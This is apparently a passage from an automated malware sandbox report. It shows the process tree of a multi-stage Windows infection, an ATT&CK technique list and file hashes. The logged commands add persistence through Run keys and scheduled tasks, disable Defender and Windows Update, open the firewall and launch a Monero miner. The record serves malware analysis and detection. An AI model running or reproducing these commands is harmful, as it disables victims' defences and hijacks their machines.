"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Musical_rhythms_for_certain_actions';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Musical_rhythms_for_certain_actions' -Value '"C:\Users\Admin\AppData\Local\Musical_rhythms_for_certain_actions\Musical_rhythms_for_certain_actions.exe"' -PropertyType 'String'
3⤵
PID:6536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1172
3⤵
- Program crash
PID:6572

C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe"
2⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
PID:6264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp137E.tmp.bat""
3⤵
PID:7088

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:2840

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
PID:6836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:1676

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:3928

C:\Users\Admin\AppData\Local\Temp\Files\build3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build3.exe"
2⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\Files\z73.exe
"C:\Users\Admin\AppData\Local\Temp\Files\z73.exe"
2⤵
PID:3364

C:\Users\Admin\AppData\Local\Temp\System\OmegaEngine.exe
"C:\Users\Admin\AppData\Local\Temp\System\OmegaEngine.exe" -B --donate-level 1 -o xmr-eu1.nanopool.org:10343 -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero -o -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero
3⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\Files\WILD_PRIDE.exe
"C:\Users\Admin\AppData\Local\Temp\Files\WILD_PRIDE.exe"
2⤵
PID:3064

C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
2⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\Files\ExifWork.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ExifWork.exe"
2⤵
PID:6168

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\Files\gold1234.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gold1234.exe"
2⤵
PID:5804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3592

C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe
"C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe"
2⤵
PID:5456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k cmd < Tunisia & exit
3⤵
PID:3952

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"
2⤵
PID:6464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "
3⤵
PID:4216

C:\Users\Admin\AppData\Local\Temp\Files\Users.exe
users.exe
4⤵
PID:5848

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:6228

C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe"
2⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe"
2⤵
PID:6444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1⤵
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1148
2⤵
- Program crash
PID:4228

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
1⤵
PID:3580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5476

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5256

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
PID:1268

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
PID:5636

C:\Windows\System32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:5688

C:\Windows\System32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:5332

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:5880

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1⤵
PID:2752

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
1⤵
PID:5416

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1⤵
PID:5992

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
1⤵
PID:6064

C:\Windows\System32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:1388

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:6120

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
PID:872

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:3916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:4216

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
2⤵
PID:1508

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:6012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:5220

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:1508

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4776

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5564

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5880

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:6004

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:5196

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:5852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:1592

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:6188

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5252

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:1216

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:5460

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:3108

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:6620

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:2860

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:1268

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:3316

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:2824

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:6996

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:412

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:6232

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:7008

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:6524

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:5596

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Java\jdk-1.8\bin\Msblockreview.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Msblockreview" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\bin\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Java\jdk-1.8\bin\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\odt\ApplicationFrameHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7144

C:\Users\Admin\AppData\Local\Temp\cHINCAdHgniafSxFI\EXEoyIeIwwZNnzh\eudiZze.exe
C:\Users\Admin\AppData\Local\Temp\cHINCAdHgniafSxFI\EXEoyIeIwwZNnzh\eudiZze.exe gf /efsite_idepj 385118 /S
1⤵
PID:652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:6104

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:6908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:5140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:6672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:1748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:6752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\odt\ApplicationFrameHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 13 /tr "'C:\odt\ApplicationFrameHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2424

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe pxpxvzslvmqtfph
1⤵
PID:5272

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:5812

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
2⤵
- Detects videocard installed
PID:5180

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:4100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Msblockreview.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Msblockreview" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\SchCache\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\SchCache\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7096

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe jgqccdbbxrzbdlfm 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMYA3jdfqtywTWLARpI3q8mmFmhW90pU5VNfoa01PrEPOLs5r8ABfO582XBZtlugNpAIuxABxOKWLf8XQtXZvoQ7dHNPMO3GgNUOP3U0XxrRiFOF/vB7jsNiVJkb1bI5v5nt59vi2Czwj87T9ujtAUxaRW+5V3BDnzrgkctEMZcXBV724S22jgwV6IzKvy6UKGJnVaM3eKyvceEhYeYhPyF7ZZaH7hc6eH/4/zT7gy/FOEOKoQlj9wOdYItup8djwg3zNzf9whNSzJ/f9PwHpnsQ==
1⤵
PID:6756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "LljM0vX9AQyXiZhg9yD0OWIbL" /sc MINUTE /mo 7 /tr "'C:\Windows\MiracastView\microsoft.system.package.metadata\LljM0vX9AQyXiZhg9yD0OWIb.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "LljM0vX9AQyXiZhg9yD0OWIb" /sc ONLOGON /tr "'C:\Windows\MiracastView\microsoft.system.package.metadata\LljM0vX9AQyXiZhg9yD0OWIb.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4108

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\ClocX\uninst.exe
Filesize
39KB

MD5
b462f3c38bc5b56e06976a94a7c36bc7

SHA1
0106bf912fa9a37bb975afb00fd4ebaf7dff13cd

SHA256
446c3dc2041bd1d0968e92ec21d538da95dd85c62535293fdca425b02587bbe5

SHA512
f33baef794d57eec26df2b173719c3dde0e8e1f9354d598662d1b86c1317b21fbff17b1ce373495f9bfe717d10b8dba1d486fee18bbb51b726e480300c606343

Download Submit
C:\ProgramData\Adobe\PFCIA.exe
Filesize
467KB

MD5
e628a2137e6ae52e9730a9abda2f458d

SHA1
